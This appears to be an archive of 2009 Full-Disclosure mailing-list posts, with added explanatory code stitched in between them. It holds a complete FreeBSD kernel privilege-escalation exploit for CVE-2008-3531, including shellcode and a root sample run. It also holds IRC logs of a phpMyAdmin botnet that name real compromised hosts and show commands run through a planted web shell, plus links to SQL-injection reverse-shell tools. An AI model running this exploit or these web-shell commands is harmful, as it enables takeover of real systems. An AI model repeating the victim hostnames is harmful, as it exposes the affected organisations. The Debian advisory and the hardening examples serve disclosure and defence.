[Full-disclosure] One Click Ownage [White Paper and Scripts]
This is a different and more practical approach to getting a reverse shell or code execution through SQL injection (particularly in MSSQL). The idea is simple: get a reverse shell from an SQL injection with one HTTP request, without using an extra channel such as TFTP or FTP to upload the initial payload.

The white paper explains the steps and the details of the attack. The scripts contain all the tools you need to create your HTTP request with your own payload.

White Paper: http://ferruh.mavituna.com/papers/oneclickownage.pdf
Scripts: http://ferruh.mavituna.com/papers/OneClickOwnageScripts.zip
Presentation (IT Underground 2009): http://www.slideshare.net/fmavituna/one-click-ownage-1660539

Regards,
-- 
http://ferruh.mavituna.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] phpMyAdmin exploited in masses
Hi. Disclosing out of boredom and for the crawlers to archive.

Keywords: phpmyadmin, web, exploit, zavod, devitalia, mwstudio, szervernet, infotel, oodrive, iceman, romania, scriptkiddie.

An example of the phpmyadmin exploit used in masses without thinking.

IRC server: irc10.iceman.ro has address 85.214.36.2 (h747052.serverkompetenz.net)
IRC port:
A few domains that are webhosted on the same IP: freebid.de, soccertreff.de, junge-werbung.com, pocket.marktcom.de.

Other possible IRC servers:
irc11.iceman.ro has address 87.106.2.154
irc12.iceman.ro has address 85.214.84.18
irc14.iceman.ro has address 82.165.30.30

12:51 <@who> 110 out of 130 hosts, please wait a few minutes before kline ;)
12:51 <IceMan> eh lol =))
12:51 <IceMan> 130 ?
12:52 <IceMan> ahaha
12:52 <IceMan> only the ones from root
12:52 <IceMan> :(
12:52 <IceMan> i have about 6000
12:52 <@who> anything else you want to share on the blog ?
12:53 <IceMan> you r makeing a bloog ?
12:53 <IceMan> blog*
12:53 <@who> no, i'm adding an entry.
12:53 <IceMan> =)))
12:53 <IceMan> on what blog ?
12:53 <@who> you'll know in time.
12:53 <IceMan> just dont add me
12:53 -!- Z [~...@iceman.ro] has joined #phpmyadmin
12:53 <IceMan> i dont wanna become a STAR

Hosts that made me stop scrolling for a second:

12:46 -!- ircb0t|558144 [~b...@static-241064.xdsl.raiffeisen.net]
12:52 -!- ircb0t|76136 [~b...@slice.corp.it]
12:50 -!- ircb0t|298636 [~b...@gw.zavod.ee]
12:50 -!- ircb0t|514818 [~b...@backup.szervernet.hu]
12:47 -!- ircb0t|803682 [~b...@b165.myrootshell.com]
12:47 -!- ircb0t|39903 [~b...@nomail.wietec.com]
12:46 -!- ircb0t|118029 [~b...@hermes.ac-net.at]
12:47 -!- ircb0t|426978 [~b...@mail.icable.at]
12:48 -!- ircb0t|622275 [www-d...@brain.servercrew.de]
12:48 -!- ircb0t|896247 [~b...@www.mwstudio.hu]
12:48 -!- ircb0t|259056 [~b...@mailserver.devitalia.it]
12:49 -!- ircb0t|691775 [~b...@thomas.livenet.ch]
12:50 -!- ircb0t|735988 [www-d...@imukuppi.org]
12:52 -!- ircb0t|981791 [~b...@doha.virtualbuilding.nl]
12:52 -!- ircb0t|376391 [~b...@crm.oodrive.com]
12:51 -!- ircb0t|305549 [~b...@azzinoth.decknet.fr]
12:50 -!- ircb0t|522103 [~b...@master.infotel.it]
12:50 -!- ircb0t|987422 [~b...@gentoo.stofan.sk]

List of all visible clients (in #root)

12:41 -!- ircb0t|348728 [~b...@ip-81-11-185-103.dsl.scarlet.be]
12:41 -!-  ircname : Linux 2.6.22-14-server
12:41 -!- ircb0t|546679 [~b...@webplus-1.nederhost.net]
12:41 -!-  ircname : Linux 2.6.21-xen
12:46 -!- ircb0t|348728 [~b...@ip-81-11-185-103.dsl.scarlet.be]
12:46 -!-  ircname : Linux 2.6.22-14-server
12:46 -!- ircb0t|546679 [~b...@webplus-1.nederhost.net]
12:46 -!-  ircname : Linux 2.6.21-xen
12:46 -!- ircb0t|768952 [9e8d281...@hartlep.eu]
12:46 -!-  ircname : Linux 2.6.18
12:46 -!- ircb0t|100341 [www-d...@bud125.internetdsl.tpnet.pl]
12:46 -!-  ircname : Linux 2.6.18-5-686
12:46 -!- ircb0t|360066 [~b...@neobitd.home.net.pl]
12:46 -!-  ircname : Linux 2.6.23
12:46 -!- ircb0t|554117 [www-d...@c-89-233-220-91.cust.bredband2.com]
12:46 -!-  ircname : Linux 2.6.17
12:46 -!- ircb0t|789508 [~b...@69.60.115.183]
12:46 -!-  ircname : Linux 2.6.17-gentoo-r8
12:46 -!- ircb0t|109012 [~b...@moldau.trilos.net]
12:46 -!-  ircname : Linux 2.6.17.7
12:46 -!- ircb0t|371797 [~b...@83-64-255-133.wiener-neudorf.xdsl-line.inode.at]
12:46 -!-  ircname : Linux 2.6.19-gentoo-r5
12:46 -!- ircb0t|557516 [~b...@r02s01.colo.vollmar.net]
12:46 -!-  ircname : Linux 2.6.18-4-686
12:46 -!- ircb0t|789854 [~b...@86.92.26.138]
12:46 -!-  ircname : Linux 2.6.18.1
12:46 -!- ircb0t|118029 [~b...@hermes.ac-net.at]
12:46 -!-  ircname : Linux 2.6.18-4-vserver-686
12:46 -!- ircb0t|375254 [~b...@217.157.23.239]
12:46 -!-  ircname : Linux 2.6.15-1-686-smp
12:46 -!- ircb0t|558144 [~b...@static-241064.xdsl.raiffeisen.net]
12:46 -!-  ircname : Linux 2.6.18-5-xen-amd64
12:46 -!- ircb0t|79389 [~b...@madletomas.netbox.cz]
12:46 -!-  ircname : Linux 2.6.14.6
12:46 -!- ircb0t|118901 [~b...@nat-130-146.man.bydgoszcz.pl]
12:46 -!-  ircname : Linux 2.6.23-gentoo-r3
12:46 -!- ircb0t|378649 [~b...@mail.jdj.com.pl]
12:46 -!-  ircname : Linux 2.6.7-1-386
12:46 -!- ircb0t|564105 [~b...@srv-h64.esp.mediateam.fi]
12:46 -!-  ircname : Linux 2.6.18-xenU
12:46 -!- ircb0t|794645 [~b...@64.56.157.143]
12:46 -!-  ircname : Linux 2.4.21-50.EL
12:46 -!- ircb0t|134194 [~b...@medimpex13.medimpex.tvnet.hu]
12:46 -!-  ircname : Linux 2.6.18-5-686
12:46 -!- ircb0t|394988 [~b...@m13s11.vlinux.de]
12:46 -!-  ircname : Linux 2.6.18
12:46 -!- ircb0t|564960 [~b...@turbine.vnetworx.net]
12:46 -!-  ircname : Linux 2.6.18-5-686
12:46 -!- ircb0t|798421 [~b...@89.104.213.130]
12:46 -!-  ircname : Linux 2.6.18-gentoo-r3
12:46 -!- ircb0t|156819 [~b...@dye204.internetdsl.tpnet.pl]
12:46 -!-  ircname : Linux 2.6.15-51-server
12:47 -!- ircb0t|39903 [~b...@nomail.wietec.com]
12:47 -!-  ircname : Linux 2.6.18-5-686
12:47 -!- ircb0t|573848 [~b...@229.ispy.se]
12:47 -!-  ircname : Linux 2.6.20-gentoo-r8
12:47 -!- ircb0t|803682 [~b...@b165.myrootshell.com]
12:47 -!-
[Full-disclosure] CVE-2008-3531
/*
 * cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com
 *
 * Privilege escalation exploit for the FreeBSD-SA-08:08.nmount
 * (CVE-2008-3531) vulnerability:
 *
 * http://security.freebsd.org/advisories/FreeBSD-SA-08:08.nmount.asc
 * http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-3531
 *
 * For a detailed analysis see:
 *
 * http://census-labs.com/news/2009/07/02/cve-2008-3531-exploit/
 *
 * Sample run:
 *
 * [a...@leon ~]$ uname -rsi
 * FreeBSD 7.0-RELEASE GENERIC
 * [a...@leon ~]$ sysctl vfs.usermount
 * vfs.usermount: 1
 * [a...@leon ~]$ id
 * uid=1001(argp) gid=1001(argp) groups=1001(argp)
 * [a...@leon ~]$ gcc -Wall cve-2008-3531.c -o cve-2008-3531
 * [a...@leon ~]$ ./cve-2008-3531
 * [*] vptr = 0x006e776f
 * [*] calling nmount()
 * nmount: Unknown error: -1036235776
 * [a...@leon ~]$ id
 * uid=0(root) gid=0(wheel) egid=1001(argp) groups=1001(argp)
 *
 * $Id: cve-2008-3531.c,v 846ca34be34a 2009/02/29 11:05:02 argp $
 */

#include <sys/param.h>
#include <sys/mount.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>

#define BUFSIZE  249
#define PAGESIZE 4096
#define ADDR     0x6e7000
#define OFFSET   1903
#define FSNAME   "msdosfs"
#define DIRPATH  "/tmp/msdosfs"

/*
 * Kernel payload: zero uid and ruid in the calling process' ucred, then
 * unwind the stack and return into vfs_donmount().
 */
unsigned char kernelcode[] =
    "\x64\xa1\x00\x00\x00\x00"      /* movl %fs:0, %eax       # get curthread */
    "\x8b\x40\x04"                  /* movl 0x4(%eax), %eax   # get proc from curthread */
    "\x8b\x40\x30"                  /* movl 0x30(%eax), %eax  # get ucred from proc */
    "\x31\xc9"                      /* xorl %ecx, %ecx        # ecx = 0 */
    "\x89\x48\x04"                  /* movl %ecx, 0x4(%eax)   # ucred.uid = 0 */
    "\x89\x48\x08"                  /* movl %ecx, 0x8(%eax)   # ucred.ruid = 0 */
                                    /* # return to the pre-previous function, i.e. vfs_donmount() */
    "\x81\xc4\xe8\x00\x00\x00"      /* addl $0xe8, %esp */
    "\x5b"                          /* popl %ebx */
    "\x5e"                          /* popl %esi */
    "\x5f"                          /* popl %edi */
    "\x5d"                          /* popl %ebp */
    "\xc3";                         /* ret */

int
main()
{
    void *vptr;
    struct iovec iov[6];

    /* Map a fixed page at ADDR and place the payload at ADDR + OFFSET. */
    vptr = mmap((void *)ADDR, PAGESIZE, PROT_READ | PROT_WRITE,
                MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);

    if(vptr == MAP_FAILED)
    {
        perror("mmap");
        exit(EXIT_FAILURE);
    }

    vptr = (char *)vptr + OFFSET;
    printf("[*] vptr = 0x%.8x\n", (unsigned int)vptr);

    memcpy(vptr, kernelcode, (sizeof(kernelcode) - 1));

    mkdir(DIRPATH, 0700);

    /* nmount(2) takes name/value string pairs: fstype, fspath, then an
     * overlong option name (BUFSIZE - 1 bytes of 0x41) with an empty value. */
    iov[0].iov_base = "fstype";
    iov[0].iov_len = strlen(iov[0].iov_base) + 1;

    iov[1].iov_base = FSNAME;
    iov[1].iov_len = strlen(iov[1].iov_base) + 1;

    iov[2].iov_base = "fspath";
    iov[2].iov_len = strlen(iov[2].iov_base) + 1;

    iov[3].iov_base = DIRPATH;
    iov[3].iov_len = strlen(iov[3].iov_base) + 1;

    iov[4].iov_base = calloc(BUFSIZE, sizeof(char));

    if(iov[4].iov_base == NULL)
    {
        perror("calloc");
        rmdir(DIRPATH);
        exit(EXIT_FAILURE);
    }

    memset(iov[4].iov_base, 0x41, (BUFSIZE - 1));
    iov[4].iov_len = BUFSIZE;

    iov[5].iov_base = "";
    iov[5].iov_len = strlen(iov[5].iov_base) + 1;

    printf("[*] calling nmount()\n");

    if(nmount(iov, 6, 0) < 0)
    {
        perror("nmount");
        rmdir(DIRPATH);
        exit(EXIT_FAILURE);
    }

    printf("[*] unmounting and deleting %s\n", DIRPATH);
    unmount(DIRPATH, 0);
    rmdir(DIRPATH);

    return EXIT_SUCCESS;
}

/* EOF */
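The exploit above hands nmount(2) a 248-byte option name that the kernel has no room for. The following user-space C is an added illustration of that bug class and is not the FreeBSD kernel's code or part of the post: an option string formatted into a fixed-size buffer with no length check, beside a version that computes the required size first and refuses anything that cannot fit. ERRMSG_LEN, PREFIX and SUFFIX are assumptions chosen for the illustration, not the kernel's constants, so the exact cut-off (228 bytes here) is specific to this model.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/*
 * Sizes assumed for this illustration only; they are not the kernel's
 * constants. ERRMSG_LEN stands in for a fixed-size message buffer that an
 * attacker-controlled option name gets formatted into.
 */
#define ERRMSG_LEN 255
#define PREFIX "mount option <"
#define SUFFIX "> is unknown"

/*
 * Vulnerable shape: sprintf() writes the whole formatted string whatever
 * the destination size, so an option name longer than
 * ERRMSG_LEN - strlen(PREFIX) - strlen(SUFFIX) - 1 bytes runs off the end
 * of errmsg. Safe to call only when the caller has already bounded optname.
 */
void format_unknown_option_unbounded(char errmsg[ERRMSG_LEN], const char *optname)
{
    sprintf(errmsg, PREFIX "%s" SUFFIX, optname);
}

/*
 * Hardened shape: compute the required length up front, refuse names that
 * cannot fit, and bound the write with snprintf() as a second line of
 * defence. Returns 0 on success or ENAMETOOLONG.
 */
int format_unknown_option_bounded(char *errmsg, size_t errmsg_len, const char *optname)
{
    size_t need = strlen(PREFIX) + strlen(optname) + strlen(SUFFIX) + 1;
    int n;

    if (need > errmsg_len)
        return ENAMETOOLONG;
    n = snprintf(errmsg, errmsg_len, PREFIX "%s" SUFFIX, optname);
    if (n < 0 || (size_t)n >= errmsg_len)
        return ENAMETOOLONG;            /* cannot happen after the check above */
    return 0;
}

/*
 * Experiment helper: build an option name of `len` 'A' bytes (the exploit
 * uses 248 of them) and report what the bounded formatter does with it.
 * Returns 0, ENAMETOOLONG, or EINVAL if len does not fit the scratch buffer.
 */
int check_option_name_len(size_t len)
{
    static char name[512];
    char errmsg[ERRMSG_LEN];

    if (len >= sizeof name)
        return EINVAL;
    memset(name, 'A', len);
    name[len] = '\0';
    return format_unknown_option_bounded(errmsg, sizeof errmsg, name);
}

int main(void)
{
    char errmsg[ERRMSG_LEN];
    size_t max_fit = ERRMSG_LEN - strlen(PREFIX) - strlen(SUFFIX) - 1;

    format_unknown_option_unbounded(errmsg, "nosuid");   /* short name: safe */
    printf("%s\n", errmsg);
    printf("longest option name that fits: %zu bytes\n", max_fit);
    printf("len=%zu -> %d\n", max_fit, check_option_name_len(max_fit));
    printf("len=%zu -> %d (ENAMETOOLONG=%d)\n", max_fit + 1,
           check_option_name_len(max_fit + 1), ENAMETOOLONG);
    printf("len=248 (the exploit's) -> %d\n", check_option_name_len(248));
    return 0;
}
```

The point of the up-front size check is that it is independent of the format string: snprintf() alone silently truncates, which is better than a stack overwrite but still hides a malformed request, whereas returning ENAMETOOLONG lets the caller fail the whole operation.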
[Full-disclosure] a simple race condition and how you'd solve it
A friend recently demonstrated on his blog a simple race condition he encountered. He also challenged folks to solve the problem.

http://www.algorithm.co.il/blogs/index.php/programming/a-simple-race-condition/

There's an interesting discussion in the comments which is worth a quick read. Also, maybe someone here will come up with a cuter idea?

Gadi.

-- 
Gadi Evron, g...@linuxbox.org.
Blog: http://gevron.livejournal.com/
Re: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface
Dear Shaked Vax,

Are you sure the Radware team has analysed a reflected attack via the user's browser (an AppWall administrator visits a malcrafted page, which redirects his request to AppWall) before excluding the remote vector?

--Thursday, July 2, 2009, 3:23:16 PM, you wrote to full-disclosure@lists.grok.org.uk:

SV> Radware team has completed analysis of the reported issue, concluding
SV> that no AppWall customer using the product according to Radware
SV> deployment recommendations would be exposed to vulnerability as a result
SV> of this issue. This is due to the facts that this issue exists only on
SV> the management interface, which is recommended to be connected to the
SV> internal LAN only, and that it does not allow performing any actions
SV> that would influence machine functionality.

SV> Nevertheless, in order to enforce our commitment to deliver a top
SV> security solution to our customers, Radware will supply a fix for this
SV> issue within its upcoming AppWall release.

SV> Shaked Vax
SV> AppWall Product Manager
SV> shak...@radware.com

-- 
Skype: Vladimir.Dubrovin
~/ZARAZA
http://securityvulns.com/
But Harry... I certainly prefer him, for his high nutritional value and some particularly tender meat. (Twain)
[Full-disclosure] [SECURITY] [DSA 1825-1] New nagios2/nagios3 packages fix arbitrary code execution
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1825-1                  secur...@debian.org
http://www.debian.org/security/                               Nico Golde
July 3rd, 2009                          http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : nagios2, nagios3
Vulnerability  : insufficient input validation
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2009-2288

It was discovered that the statuswml.cgi script of nagios, a monitoring
and management system for hosts, services and networks, is prone to a
command injection vulnerability. Input to the ping and traceroute
parameters of the script is not properly validated, which allows an
attacker to execute arbitrary shell commands by passing a crafted value
to these parameters.

For the oldstable distribution (etch), this problem has been fixed in
version 2.6-2+etch3 of nagios2.

For the stable distribution (lenny), this problem has been fixed in
version 3.0.6-4~lenny2 of nagios3.

For the testing distribution (squeeze), this problem has been fixed in
version 3.0.6-5 of nagios3.

For the unstable distribution (sid), this problem has been fixed in
version 3.0.6-5 of nagios3.

We recommend that you upgrade your nagios2/nagios3 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:

  http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2.diff.gz
    Size/MD5 checksum:    38428 42d830b18bfdeb3292cc926c81e93611
  http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6.orig.tar.gz
    Size/MD5 checksum:  2735504 900e3f4164f4b2a18485420eeaefe812
  http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2.dsc
    Size/MD5 checksum:     1589 228a65351afe2ce6028c3e4b38a7dbd7

Architecture independent packages:

  http://security.debian.org/pool/updates/main/n/nagios3/nagios3-doc_3.0.6-4~lenny2_all.deb
    Size/MD5 checksum:  2070624 a3d6285aa4ca170dff3ebc37c661a87f
  http://security.debian.org/pool/updates/main/n/nagios3/nagios3-common_3.0.6-4~lenny2_all.deb
    Size/MD5 checksum:    76976 46391e4a013e6f4b9d22e7529f5836c2

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_alpha.deb
    Size/MD5 checksum:  1652478 eeb78e031b3e0df336d473738bb849c3
  http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_alpha.deb
    Size/MD5 checksum:  2256566 1691fcda957f56aa58d4a564249e3cc3

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_amd64.deb
    Size/MD5 checksum:  1533972 c161bf872c5d5e08188ab30d0ea47acc
  http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_amd64.deb
    Size/MD5 checksum:  2537724 75ea70e06091246d69457b3206e7dd57

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_arm.deb
    Size/MD5 checksum:  2219494 fac6212f49e1645e5e562753f342ea73
  http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_arm.deb
    Size/MD5 checksum:  1387152 40e50777dc68548be1cc4d9340074a78

armel architecture (ARM EABI)

  http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_armel.deb
    Size/MD5 checksum:  1444282 639e4563d6009d69c6684117a4d252cd
  http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_armel.deb
    Size/MD5 checksum:  2265242 a2874c655c74e88a52838fd0742544aa

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_hppa.deb
    Size/MD5 checksum:  1557384 49575bfdb3ce7ade125e560586eae41f
  http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_hppa.deb
    Size/MD5 checksum:  2362452 360e17eafca70d4124ef4aadb11498d1

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/n/nagios3/nagios3_3.0.6-4~lenny2_i386.deb
    Size/MD5 checksum:  1382416 bcce0eb86a0e94123b73650e49893193
  http://security.debian.org/pool/updates/main/n/nagios3/nagios3-dbg_3.0.6-4~lenny2_i386.deb
    Size/MD5 checksum:  2330734
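The advisory describes the bug only as unvalidated ping and traceroute parameters reaching a shell. The C below is an added illustration of that class and its fix, written for this page; it is not the statuswml.cgi source or the Debian patch. It puts the vulnerable shape (request value spliced into a popen() command line) beside a hardened one: a strict allowlist for the host value, and execv() with an argv array so no shell ever parses it. The function names, the 255-byte host limit and the /bin/ping path are assumptions for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

#define MAX_HOST_LEN 255   /* assumed bound for the example */

/*
 * Vulnerable shape (illustration, not the Nagios code): the CGI parameter
 * is spliced into a shell command line, so a value such as "127.0.0.1; id"
 * makes /bin/sh run id with the web server's privileges.
 */
void ping_via_shell_unsafe(const char *host)
{
    char cmd[512];
    char line[256];
    FILE *fp;

    snprintf(cmd, sizeof cmd, "/bin/ping -c 3 %s", host);
    fp = popen(cmd, "r");                 /* popen() runs /bin/sh -c cmd */
    if (fp == NULL)
        return;
    while (fgets(line, sizeof line, fp) != NULL)
        fputs(line, stdout);
    pclose(fp);
}

/*
 * Allowlist check for a hostname or dotted IPv4 address: letters, digits,
 * '.' and '-' only, bounded length, and no leading '-' or '.' so the value
 * can neither be parsed as an option by the child nor start a path.
 * Returns 1 if acceptable, 0 otherwise.
 */
int is_safe_host(const char *host)
{
    size_t i, len;

    if (host == NULL)
        return 0;
    len = strlen(host);
    if (len == 0 || len > MAX_HOST_LEN || host[0] == '-' || host[0] == '.')
        return 0;
    for (i = 0; i < len; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-'))
            return 0;
    }
    return 1;
}

/*
 * Hardened shape: validate first, then exec the binary directly with an
 * argv array. No shell is involved, so metacharacters carry no meaning.
 * Returns the child's exit status, or -1 if the host was rejected or the
 * fork/exec/wait failed.
 */
int ping_via_execv(const char *host)
{
    pid_t pid;
    int status;

    if (!is_safe_host(host))
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "/bin/ping", "-c", "3", (char *)host, NULL };
        execv(argv[0], argv);
        _exit(127);                       /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char **argv)
{
    /* Constructed default input: what an attacker would send as ?ping= */
    const char *host = argc > 1 ? argv[1] : "127.0.0.1; id";

    if (!is_safe_host(host)) {
        fprintf(stderr, "rejected host parameter: %s\n", host);
        return 1;
    }
    return ping_via_execv(host);
}
```

The allowlist is deliberately narrower than what a hostname may legally contain (no IPv6 colons, no underscores) because the check has to be right for the argument position it feeds, not merely for DNS; if ping is later given more arguments, the validator is the one place to revisit. Run it with no argument to see the injected value rejected, or with a real host to see ping executed without a shell.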
[Full-disclosure] Iceman.Ro - 'new' botnet to come
18:13 -!- IceMan` [...@iceman.ro] has joined #root
18:13 <pink_panther> Hello, friend
18:13 <IceMan`> uh :)
18:13 <pink_panther> We were just talking about you
18:13 <L> hi there
18:13 <IceMan`> eh i must close this ircd 2
18:13 <IceMan`> uf uf uf
18:13 <pink_panther> a
18:13 <IceMan`> brb closing the domein
18:13 <IceMan`> domain*
18:13 <pink_panther> but it's so cute how you basically took the milw0rm sploit and didn't change it
18:13 <pink_panther> so everyone could share on these hosts
18:13 <pink_panther> you're really a nice guy
18:13 <IceMan`> not really
18:13 <pink_panther> well yes really.
18:14 <IceMan`> 87.98.169.9
18:14 <IceMan`> hack it
18:14 <IceMan`> 87.98.169.9/phpmyadmin/
18:14 <pink_panther> http://imukuppi.org/phpmyadmin/config.inc.php?p=phpinfo();
18:14 <L> http://87.98.169.9/phpmyadmin/config.inc.php?c=id
18:14 <IceMan`> L eh
18:14 <IceMan`> not like that
18:14 <IceMan`> because
18:14 <IceMan`> i put the code there
18:15 <IceMan`> but hack it like it was fresh
18:15  * pink_panther hahahaHAHaHAhAHahaHAhahaHahaHahahahahAhahahahaha
18:15 <L> uid=33(www-data) gid=33(www-data) groups=33(www-data)
18:15 <pink_panther> you so don't get it
18:15 <IceMan`> eh nevermind
18:15 <pink_panther> this is fucking entertaining
18:15 <L> huauahua
18:15 <IceMan`> i will close the ircd`s anyway :))
18:15 <pink_panther> you were klining me earlier
18:15 <IceMan`> and open bthe on other domeins